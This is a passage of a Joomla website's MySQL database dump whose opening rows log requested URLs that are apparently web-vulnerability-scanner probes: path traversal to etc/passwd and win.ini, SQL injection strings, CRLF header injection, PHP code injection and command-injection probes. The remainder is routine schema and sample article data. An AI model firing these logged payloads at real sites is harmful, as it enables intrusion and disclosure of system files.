00:00:00'),(612,'http://www.lider-26.ru/index.php/9-%f0%27%27%f0%22%22/images/sampledata/icetheme','','','',1,0,'2016-08-27 01:48:23','0000-00-00 00:00:00'),(613,'http://www.lider-26.ru/index.php/OTg2MTkx-icetheme/images/sampledata/icetheme','','','',1,0,'2016-08-27 01:48:24','0000-00-00 00:00:00'),(614,'http://www.lider-26.ru/index.php/9-icetheme/images/%e3h/icetheme','','','',1,0,'2016-08-27 01:48:27','0000-00-00 00:00:00'),(615,'http://www.lider-26.ru/index.php/9-icetheme/images/..%c0%af/icetheme','','','',1,0,'2016-08-27 01:48:28','0000-00-00 00:00:00'),(616,'http://www.lider-26.ru/index.php/9-icetheme/%bf%27%bf%22/sampledata/icetheme','','','',1,0,'2016-08-27 01:48:39','0000-00-00 00:00:00'),(617,'http://www.lider-26.ru/index.php/9-icetheme/%f0%27%27%f0%22%22/sampledata/icetheme','','','',1,0,'2016-08-27 01:48:40','0000-00-00 00:00:00'),(618,'http://www.lider-26.ru/index.php/9-icetheme/images/sampledata/268435455','','','',1,0,'2016-08-27 01:48:42','0000-00-00 00:00:00'),(619,'http://www.lider-26.ru/index.php/9-icetheme/images/sampledata/%e3h','','','',1,0,'2016-08-27 01:48:43','0000-00-00 00:00:00'),(620,'http://www.lider-26.ru/index.php/9-icetheme/images/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd/icetheme','','','',1,0,'2016-08-27 01:48:43','0000-00-00 00:00:00'),(621,'http://www.lider-26.ru/index.php/9-icetheme/images/sampledata/..%c0%af','','','',1,0,'2016-08-27 01:48:44','0000-00-00 00:00:00'),(622,'http://www.lider-26.ru/index.php/9-icetheme/images/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini/icetheme','','','',1,0,'2016-08-27 01:48:46','0000-00-00 00:00:00'),(623,'http://www.lider-26.ru/index.php/9-icetheme/images/%bf%27%bf%22/icetheme','','','',1,0,'2016-08-27 01:48:51','0000-00-00 00:00:00'),(624,'http://www.lider-26.ru/index.php/9-icetheme/images/%f0%27%27%f0%22%22/icetheme','','','',1,0,'2016-08-27 01:48:52','0000-00-00 00:00:00'),(625,'http://www.lider-26.ru/index.php/images/leader/%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs','','','',1,0,'2016-08-27 01:48:54','0000-00-00 00:00:00'),(626,'http://www.lider-26.ru/index.php/9-icetheme/images/sampledata/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd','','','',1,0,'2016-08-27 01:49:00','0000-00-00 00:00:00'),(627,'http://www.lider-26.ru/index.php/9-icetheme/images/sampledata/%bf%27%bf%22','','','',1,0,'2016-08-27 01:49:01','0000-00-00 00:00:00'),(628,'http://www.lider-26.ru/index.php/9-icetheme/images/sampledata/%f0%27%27%f0%22%22','','','',1,0,'2016-08-27 01:49:03','0000-00-00 00:00:00'),(629,'http://www.lider-26.ru/index.php/9-icetheme/images/sampledata/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini','','','',1,0,'2016-08-27 01:49:03','0000-00-00 00:00:00'),(630,'http://www.lider-26.ru/index.php/images/leader/%26dir','','','',1,0,'2016-08-27 01:49:09','0000-00-00 00:00:00'),(631,'http://www.lider-26.ru/index.php/images/leader/%7cdir','','','',1,0,'2016-08-27 01:49:11','0000-00-00 00:00:00'),(632,'http://www.lider-26.ru/index.php/images/leader/%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29%29','','','',1,0,'2016-08-27 01:49:30','0000-00-00 00:00:00'),(633,'http://www.lider-26.ru/index.php/images/leader/%24%7b%40print%28md5%28acunetix_wvs_security_test%29%29%7d','','','',1,0,'2016-08-27 01:49:44','0000-00-00 00:00:00'),(634,'http://www.lider-26.ru/index.php/images/leader/%24%7b%40print%28md5%28acunetix_wvs_security_test%29%29%7d%5c','','','',1,0,'2016-08-27 01:49:45','0000-00-00 00:00:00'),(635,'http://www.lider-26.ru/index.php/images/leader/%29','','','',1,0,'2016-08-27 01:49:55','0000-00-00 00:00:00'),(636,'http://www.lider-26.ru/index.php/images/leader/%21%28%28%29%26%26%21%7c*%7c*%7c','','','',1,0,'2016-08-27 01:49:57','0000-00-00 00:00:00'),(637,'http://www.lider-26.ru/index.php/images/leader/%5e%28%23%24%21%40%23%24%29%28%28%29%29%29******','','','',1,0,'2016-08-27 01:49:58','0000-00-00 00:00:00'),(638,'http://www.lider-26.ru/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00','','','',1,0,'2016-08-27 01:50:01','0000-00-00 00:00:00'),(639,'http://www.lider-26.ru/index.php/images/leader/%27%22','','','',1,0,'2016-08-27 01:50:01','0000-00-00 00:00:00'),(640,'http://www.lider-26.ru/index.php/images/leader/%3c%21--','','','',1,0,'2016-08-27 01:50:03','0000-00-00 00:00:00'),(641,'http://www.lider-26.ru/index.php?option=com_advertising&controller=../../../../../../../../../etc/passwd%00','','','',1,0,'2016-08-27 01:50:09','0000-00-00 00:00:00'),(642,'http://www.lider-26.ru/index.php?option=com_advertising&controller=../../../../../../etc/passwd%00','','','',1,0,'2016-08-27 01:50:18','0000-00-00 00:00:00'),(643,'http://www.lider-26.ru/index.php?option=com_advertising&controller=../../../../../etc/passwd%00','','','',1,0,'2016-08-27 01:50:25','0000-00-00 00:00:00'),(644,'http://www.lider-26.ru/index.php/images/leader/OTcwMjM3','','','',1,0,'2016-08-27 01:50:29','0000-00-00 00:00:00'),(645,'http://www.lider-26.ru/index.php?option=com_advertising&controller=../../../../etc/passwd%00','','','',1,0,'2016-08-27 01:50:29','0000-00-00 00:00:00'),(646,'http://www.lider-26.ru/index.php?option=com_advertising&controller=../../../etc/passwd%00','','','',1,0,'2016-08-27 01:50:33','0000-00-00 00:00:00'),(647,'http://www.lider-26.ru/index.php/images/leader/','','','',1,0,'2016-08-27 01:50:33','0000-00-00 00:00:00'),(648,'http://www.lider-26.ru/index.php/images/leader/268435455','','','',1,0,'2016-08-27 01:50:34','0000-00-00 00:00:00'),(649,'http://www.lider-26.ru/index.php/images/leader/%e3h','','','',1,0,'2016-08-27 01:50:36','0000-00-00 00:00:00'),(650,'http://www.lider-26.ru/index.php?option=com_advertising&controller=../../etc/passwd%00','','','',1,0,'2016-08-27 01:50:37','0000-00-00 00:00:00'),(651,'http://www.lider-26.ru/index.php/images/leader/..%c0%af','','','',1,0,'2016-08-27 01:50:37','0000-00-00 00:00:00'),(652,'http://www.lider-26.ru/index.php/images/leader/%40%40LnIUE','','','',1,0,'2016-08-27 01:50:59','0000-00-00 00:00:00'),(653,'http://www.lider-26.ru/index.php/images/leader/JyI%3d','','','',1,0,'2016-08-27 01:51:00','0000-00-00 00:00:00'),(654,'http://www.lider-26.ru/index.php/images/leader/%bf%27%bf%22','','','',1,0,'2016-08-27 01:51:01','0000-00-00 00:00:00'),(655,'http://www.lider-26.ru/index.php/images/leader/%f0%27%27%f0%22%22','','','',1,0,'2016-08-27 01:51:03','0000-00-00 00:00:00'),(656,'http://www.lider-26.ru/index.php/images/leader/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd','','','',1,0,'2016-08-27 01:51:10','0000-00-00 00:00:00'),(657,'http://www.lider-26.ru/index.php/images/leader/Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n','','','',1,0,'2016-08-27 01:51:12','0000-00-00 00:00:00'),(658,'http://www.lider-26.ru/index.php/images/leader/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.png','','','',1,0,'2016-08-27 01:51:13','0000-00-00 00:00:00'),(659,'http://www.lider-26.ru/index.php/images/leader/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd','','','',1,0,'2016-08-27 01:51:16','0000-00-00 00:00:00'),(660,'http://www.lider-26.ru/index.php/images/leader/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini','','','',1,0,'2016-08-27 01:51:19','0000-00-00 00:00:00'),(661,'http://www.lider-26.ru/index.php/images/leader/5','','','',1,0,'2016-08-27 01:51:20','0000-00-00 00:00:00'),(662,'http://www.lider-26.ru/index.php/images/leader/................windowswin.ini','','','',1,0,'2016-08-27 01:51:20','0000-00-00 00:00:00'),(663,'http://www.lider-26.ru/index.php/images/leader/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini','','','',1,0,'2016-08-27 01:51:21','0000-00-00 00:00:00'),(664,'http://www.lider-26.ru/index.php/images/leader/9-5','','','',1,0,'2016-08-27 01:51:25','0000-00-00 00:00:00'),(665,'http://www.lider-26.ru/index.php/9-icetheme/features/268435455-module-variations-2','','','',1,0,'2016-08-27 01:51:25','0000-00-00 00:00:00'),(666,'http://www.lider-26.ru/index.php/9-icetheme/features/%e3h-module-variations-2','','','',1,0,'2016-08-27 01:51:27','0000-00-00 00:00:00'),(667,'http://www.lider-26.ru/index.php/9-icetheme/features/..%c0%af-module-variations-2','','','',1,0,'2016-08-27 01:51:28','0000-00-00 00:00:00'),(668,'http://www.lider-26.ru/index.php/9-icetheme/features/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd-module-variations-2','','','',1,0,'2016-08-27 01:51:41','0000-00-00 00:00:00'),(669,'http://www.lider-26.ru/index.php/images/leader/-1%27%20or%20%273%27%3d%273','','','',1,0,'2016-08-27 01:51:42','0000-00-00 00:00:00'),(670,'http://www.lider-26.ru/index.php/images/leader/-1%27%20or%20%273%27%3d%270','','','',1,0,'2016-08-27 01:51:43','0000-00-00 00:00:00'),(671,'http://www.lider-26.ru/index.php/9-icetheme/features/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini-module-variations-2','','','',1,0,'2016-08-27 01:51:44','0000-00-00 00:00:00'),(672,'http://www.lider-26.ru/index.php/images/leader/-1%22%20or%20%223%22%3d%223','','','',1,0,'2016-08-27 01:51:45','0000-00-00 00:00:00'),(673,'http://www.lider-26.ru/index.php/images/leader/-1%22%20or%20%223%22%3d%220','','','',1,0,'2016-08-27 01:51:46','0000-00-00 00:00:00'),(674,'http://www.lider-26.ru/index.php/9-icetheme/features/18-..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd-2','','','',1,0,'2016-08-27 01:52:00','0000-00-00 00:00:00'),(675,'http://www.lider-26.ru/index.php/9-icetheme/features/%bf%27%bf%22-module-variations-2','','','',1,0,'2016-08-27 01:52:09','0000-00-00 00:00:00'),(676,'http://www.lider-26.ru/index.php/9-icetheme/features/%f0%27%27%f0%22%22-module-variations-2','','','',1,0,'2016-08-27 01:52:10','0000-00-00 00:00:00'),(677,'http://www.lider-26.ru/index.php/9-icetheme/features/18-module-variations-..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd','','','',1,0,'2016-08-27 01:52:23','0000-00-00 00:00:00'),(678,'http://www.lider-26.ru/index.php?option=com_lead&task=display&archive=1&Itemid=65&leadstatus=1%27','','','',1,0,'2016-08-27 01:54:16','0000-00-00 00:00:00'),(679,'http://www.lider-26.ru/index.php?option=com_jstore&controller=product-display&task=1%27','','','',1,0,'2016-08-27 01:56:06','0000-00-00 00:00:00');

--
-- Table structure for table `l_schemas`
--

CREATE TABLE `l_schemas` (
  `extension_id` int(11) NOT NULL,
  `version_id` varchar(20) NOT NULL,
  PRIMARY KEY (`extension_id`,`version_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `l_schemas`
--

INSERT INTO `l_schemas` VALUES (700,'3.1.4');

--
-- Table structure for table `l_tags`
--

CREATE TABLE `l_tags` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `parent_id` int(10) unsigned NOT NULL DEFAULT '0',
  `lft` int(11) NOT NULL DEFAULT '0',
  `rgt` int(11) NOT NULL DEFAULT '0',
  `level` int(10) unsigned NOT NULL DEFAULT '0',
  `path` varchar(255) NOT NULL DEFAULT '',
  `title` varchar(255) NOT NULL,
  `alias` varchar(255) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL DEFAULT '',
  `note` varchar(255) NOT NULL DEFAULT '',
  `description` mediumtext NOT NULL,
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `access` int(10) unsigned NOT NULL DEFAULT '0',
  `params` text NOT NULL,
  `metadesc` varchar(1024) NOT NULL COMMENT 'The meta description for the page.',
  `metakey` varchar(1024) NOT NULL COMMENT 'The meta keywords for the page.',
  `metadata` varchar(2048) NOT NULL COMMENT 'JSON encoded metadata properties.',
  `created_user_id` int(10) unsigned NOT NULL DEFAULT '0',
  `created_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by_alias` varchar(255) NOT NULL DEFAULT '',
  `modified_user_id` int(10) unsigned NOT NULL DEFAULT '0',
  `modified_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `images` text NOT NULL,
  `urls` text NOT NULL,
  `hits` int(10) unsigned NOT NULL DEFAULT '0',
  `language` char(7) NOT NULL,
  `version` int(10) unsigned NOT NULL DEFAULT '1',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`id`),
  KEY `tag_idx` (`published`,`access`),
  KEY `idx_access` (`access`),
  KEY `idx_checkout` (`checked_out`),
  KEY `idx_path` (`path`),
  KEY `idx_left_right` (`lft`,`rgt`),
  KEY `idx_alias` (`alias`),
  KEY `idx_language` (`language`)
) ENGINE=InnoDB AUTO_INCREMENT=10 DEFAULT CHARSET=utf8;

--
-- Dumping data for table `l_tags`
--

INSERT INTO `l_tags` VALUES (1,0,0,17,0,'','ROOT','root','','',1,0,'0000-00-00 00:00:00',1,'{}','','','',0,'2011-01-01 00:00:01','',0,'0000-00-00 00:00:00','','',0,'*',1,'0000-00-00 00:00:00','0000-00-00 00:00:00'),(2,1,1,2,1,'test-tag','Test Tag','test-tag','','Testing',1,0,'0000-00-00 00:00:00',1,'{\"tag_layout\":\"\",\"tag_link_class\":\"label label-info\"}','','','{\"author\":\"\",\"robots\":\"\"}',445,'2013-07-29 09:14:11','',0,'0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','',0,'*',1,'0000-00-00 00:00:00','0000-00-00 00:00:00'),(3,1,3,4,1,'joomla','joomla','joomla','','',1,0,'0000-00-00 00:00:00',1,'','','','',445,'2013-07-29 09:16:00','',0,'0000-00-00 00:00:00','','',0,'*',1,'0000-00-00 00:00:00','0000-00-00 00:00:00'),(4,1,5,6,1,'icetheme','icetheme','icetheme','','',1,0,'0000-00-00 00:00:00',1,'','','','',445,'2013-07-29 09:16:00','',0,'0000-00-00 00:00:00','','',0,'*',1,'0000-00-00 00:00:00','0000-00-00 00:00:00'),(5,1,7,8,1,'love','love','love','','',1,0,'0000-00-00 00:00:00',1,'','','','',445,'2013-08-01 09:14:11','',0,'0000-00-00 00:00:00','','',0,'*',1,'0000-00-00 00:00:00','0000-00-00 00:00:00'),(6,1,9,10,1,'beautiful','beautiful','beautiful','','',1,0,'0000-00-00 00:00:00',1,'','','','',445,'2013-08-01 09:14:11','',0,'0000-00-00 00:00:00','','',0,'*',1,'0000-00-00 00:00:00','0000-00-00 00:00:00'),(7,1,11,12,1,'test','test','test','','',1,0,'0000-00-00 00:00:00',1,'','','','',302,'2013-08-27 08:05:12','',0,'0000-00-00 00:00:00','','',0,'*',1,'0000-00-00 00:00:00','0000-00-00 00:00:00'),(8,1,13,14,1,'test1','test1','test1','','',1,0,'0000-00-00 00:00:00',1,'','','','',302,'2013-08-27 08:06:23','',0,'0000-00-00 00:00:00','','',0,'*',1,'0000-00-00 00:00:00','0000-00-00 00:00:00'),(9,1,15,16,1,'test2','test2','test2','','',1,0,'0000-00-00 00:00:00',1,'','','','',302,'2013-08-27 08:06:23','',0,'0000-00-00 00:00:00','','',0,'*',1,'0000-00-00 00:00:00','0000-00-00 00:00:00');

--
-- Table structure for table `l_template_styles`
--

CREATE TABLE `l_template_styles` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `template` varchar(50) NOT NULL DEFAULT '',
  `client_id` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `home` char(7) NOT NULL DEFAULT '0',
  `title` varchar(255) NOT NULL DEFAULT '',
  `params` text NOT NULL,
  PRIMARY KEY (`id`),
  KEY `idx_template` (`template`),
  KEY `idx_home` (`home`)
) ENGINE=InnoDB AUTO_INCREMENT=12 DEFAULT CHARSET=utf8;

--
-- Dumping data for table `l_template_styles`
--

INSERT INTO `l_template_styles` VALUES (4,'beez3',0,'0','Beez3 - Default','{\"wrapperSmall\":\"53\",\"wrapperLarge\":\"72\",\"logo\":\"images\\/joomla_black.gif\",\"sitetitle\":\"Joomla!\",\"sitedescription\":\"Open Source Content Management\",\"navposition\":\"left\",\"templatecolor\":\"personal\",\"html5\":\"0\"}'),(5,'hathor',1,'0','Hathor - Default','{\"showSiteName\":\"0\",\"colourChoice\":\"\",\"boldText\":\"0\"}'),(7,'protostar',0,'0','protostar - Default','{\"templateColor\":\"\",\"logoFile\":\"\",\"googleFont\":\"1\",\"googleFontName\":\"Open+Sans\",\"fluidContainer\":\"0\"}'),(8,'isis',1,'1','isis - Default','{\"templateColor\":\"\",\"logoFile\":\"\"}'),(9,'icetheme',0,'0','icetheme - Default','{\"templateColor\":\"#08C\",\"templateBackgroundColor\":\"#F4F6F7\",\"logoFile\":\"\",\"sitetitle\":\"\",\"sitedescription\":\"\",\"googleFont\":\"1\",\"googleFontName\":\"Open+Sans\",\"fluidContainer\":\"0\"}'),(11,'it_enterprise',0,'1','it_enterprise - Default','{\"TemplateStyle\":\"style4\",\"styleswitcher\":0,\"responsive_template\":1,\"logo\":\"images\\/sampledata\\/icetheme\\/logo7.png\",\"sidebar_position\":\"right\",\"sidebar_span\":\"normal\",\"homepage_content\":0,\"equal_columns\":0,\"icelogo\":0,\"go2top\":1,\"social_icons\":0,\"social_icon_fb\":0,\"social_fb_user\":\"icetheme\",\"social_icon_tw\":0,\"social_tw_user\":\"icetheme\",\"social_icon_youtube\":0,\"social_yt_user\":\"icetheme\",\"googleplus\":0,\"googleplus_id\":\"icetheme\",\"social_linkedin\":0,\"linkedin_id\":\"icetheme\",\"rss_feed\":0,\"rss_feed_url\":\"http:\\/\\/feeds.feedburner.com\\/icetheme\",\"custom_css_code\":\"#categories { margin-top: 40px; }\\r\\n.search { padding: 50px 0 0; }\\r\\n\",\"google_analytics\":0,\"analytics_code\":\"\"}');

--
-- Table structure for table `l_ucm_base`
--

CREATE TABLE `l_ucm_base` (
  `ucm_id` int(10) unsigned NOT NULL,
  `ucm_item_id` int(10) NOT NULL,
  `ucm_type_id` int(11) NOT NULL,
  `ucm_language_id` int(11) NOT NULL,
  PRIMARY KEY (`ucm_id`),
  KEY `idx_ucm_item_id` (`ucm_item_id`),
  KEY `idx_ucm_type_id` (`ucm_type_id`),
  KEY `idx_ucm_language_id` (`ucm_language_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `l_ucm_base`
--

INSERT INTO `l_ucm_base` VALUES (1,65,1,0),(2,64,1,0),(3,97,1,0),(4,98,1,0);

--
-- Table structure for table `l_ucm_content`
--

CREATE TABLE `l_ucm_content` (
  `core_content_id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `core_type_alias` varchar(255) NOT NULL DEFAULT '' COMMENT 'FK to the content types table',
  `core_title` varchar(255) NOT NULL,
  `core_alias` varchar(255) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL DEFAULT '',
  `core_body` mediumtext NOT NULL,
  `core_state` tinyint(1) NOT NULL DEFAULT '0',
  `core_checked_out_time` varchar(255) NOT NULL DEFAULT '',
  `core_checked_out_user_id` int(10) unsigned NOT NULL DEFAULT '0',
  `core_access` int(10) unsigned NOT NULL DEFAULT '0',
  `core_params` text NOT NULL,
  `core_featured` tinyint(4) unsigned NOT NULL DEFAULT '0',
  `core_metadata` varchar(2048) NOT NULL COMMENT 'JSON encoded metadata properties.',
  `core_created_user_id` int(10) unsigned NOT NULL DEFAULT '0',
  `core_created_by_alias` varchar(255) NOT NULL DEFAULT '',
  `core_created_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `core_modified_user_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'Most recent user that modified',
  `core_modified_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `core_language` char(7) NOT NULL,
  `core_publish_up` datetime NOT NULL,
  `core_publish_down` datetime NOT NULL,
  `core_content_item_id` int(10) unsigned DEFAULT NULL COMMENT 'ID from the individual type table',
  `asset_id` int(10) unsigned DEFAULT NULL COMMENT 'FK to the #__assets table.',
  `core_images` text NOT NULL,
  `core_urls` text NOT NULL,
  `core_hits` int(10) unsigned NOT NULL DEFAULT '0',
  `core_version` int(10) unsigned NOT NULL DEFAULT '1',
  `core_ordering` int(11) NOT NULL DEFAULT '0',
  `core_metakey` text NOT NULL,
  `core_metadesc` text NOT NULL,
  `core_catid` int(10) unsigned NOT NULL DEFAULT '0',
  `core_xreference` varchar(50) NOT NULL COMMENT 'A reference to enable linkages to external data sets.',
  `core_type_id` int(10) unsigned DEFAULT NULL,
  PRIMARY KEY (`core_content_id`),
  KEY `tag_idx` (`core_state`,`core_access`),
  KEY `idx_access` (`core_access`),
  KEY `idx_alias` (`core_alias`),
  KEY `idx_language` (`core_language`),
  KEY `idx_title` (`core_title`),
  KEY `idx_modified_time` (`core_modified_time`),
  KEY `idx_created_time` (`core_created_time`),
  KEY `idx_content_type` (`core_type_alias`),
  KEY `idx_core_modified_user_id` (`core_modified_user_id`),
  KEY `idx_core_checked_out_user_id` (`core_checked_out_user_id`),
  KEY `idx_core_created_user_id` (`core_created_user_id`),
  KEY `idx_core_type_id` (`core_type_id`)
) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8 COMMENT='Contains core content data in name spaced fields';

--
-- Dumping data for table `l_ucm_content`
--

INSERT INTO `l_ucm_content` VALUES (1,'com_content.article','Oxford \'risking its reputation\' by taking in wealthy foreigners.','new-advice-about-giving-solid-foods-to-infants-1','<div class=\"img\">\r\n<a href=\"#\">\r\n<img src=\"images/sampledata/icetheme/articles/image1.jpg\"  />\r\n</a>\r\n</div>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed auctor dolor sed nunc eleifend pharetra euismod vitae sapien. Vivamus nec purus felis. Nam felis lectus, feugiat ac leo non, luctus elementum augue. Duis eu lorem.</p>\r\n\r\n',1,'',0,1,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',0,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',445,'','2013-06-27 10:59:15',302,'2013-08-30 09:40:52','*','2013-06-27 10:59:15','0000-00-00 00:00:00',65,377,'{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}',31,18,5,'','',14,'',1),(2,'com_content.article','Michael Gove attacks \'weak\' Ed Miliband over unions.','new-advice-about-giving-solid-foods-to-infants','<div class=\"img\">\r\n<a href=\"#\">\r\n<img src=\"images/sampledata/icetheme/articles/image2.jpg\"  />\r\n</a>\r\n</div>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed auctor dolor sed nunc eleifend pharetra euismod vitae sapien. Vivamus nec purus felis. Nam felis lectus, feugiat ac leo non, luctus elementum augue. Duis eu lorem.</p>\r\n\r\n',1,'',0,1,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',0,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',445,'','2013-06-27 10:49:00',302,'2013-08-30 09:42:57','*','2013-06-27 10:49:00','0000-00-00 00:00:00',64,378,'{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}',5,15,6,'','',14,'',1),(3,'com_content.article','Most popular universities in Clearing 2013 so far.','medtronic-is-changing-its-business-model-will-the-system-let-it','<div class=\"img\">\r\n<a href=\"#\">\r\n<img src=\"images/sampledata/icetheme/articles/image5.jpg\"  />\r\n</a>\r\n</div>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed auctor dolor sed nunc eleifend pharetra euismod vitae sapien. Vivamus nec purus felis. Nam felis lectus, feugiat ac leo non, luctus elementum augue. Duis eu lorem.</p>\r\n\r\n',1,'',0,1,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',0,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',302,'','2013-06-27 10:59:15',302,'2013-08-30 09:43:52','*','2013-06-27 10:59:15','0000-00-00 00:00:00',97,387,'{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}',0,3,4,'','',14,'',1),(4,'com_content.article','Private school A-level tables: Welsh college tops rankings.','medtronic-is-changing-its-business-model-will-the-system-let-it-2','<div 